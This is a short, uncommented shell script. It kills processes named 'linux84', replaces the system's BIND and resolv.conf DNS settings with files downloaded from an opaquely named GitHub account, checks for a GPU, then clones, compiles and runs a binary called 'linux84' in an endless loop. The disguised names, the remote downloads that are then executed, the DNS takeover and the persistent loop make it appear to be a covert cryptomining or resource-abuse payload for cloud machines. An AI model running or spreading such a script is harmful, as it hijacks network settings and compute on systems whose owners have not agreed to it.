pkill -f linux84
pkill -f linux84
pkill -f linux84
pkill -f linux84
pkill -f linux84
pkill -f linux84
pkill -f linux84
pkill -f linux84

rm -rf /mnt/disks/user/project/linux8474/

apt-get update

apt-get install -y bind9 bind9utils bind9-doc dnsutils

cd /etc/bind/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/named.conf.options

service bind9 restart

cd /etc/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/resolv.conf

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

mkdir /mnt/disks/

mkdir /mnt/disks/user/

mkdir /mnt/disks/user/project/

cd /mnt/disks/user/project/

apt-get install -y libcpprest-dev libgmp-dev libargon2-0-dev

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

google84121274=$(nvidia-smi --query-gpu=memory.total --format=csv | sed 's/MiB//g' | sed 's/memory.total//g' | sed 's/\s+\n+\r+//g' | sed 's/\[//g' | sed 's/\]//g')

if [[ $google84121274 == *"failed"* ]]; then

git clone https://github.com/mobileapps84741274/linuxcpu84
cd linuxcpu84
mkdir build
cd build
cmake .. -DCMAKE_BUILD_TYPE=Release -DWITH_CUDA:BOOL="0"
make

sleep 34

while true
do

./linux84 8

done

else

git clone https://github.com/mobileapps84741274/linux8474
cd linux8474
mkdir build
cd build
cmake .. -DCMAKE_BUILD_TYPE=Release
make

sleep 34

while true
do

./linux84 8

done

fi
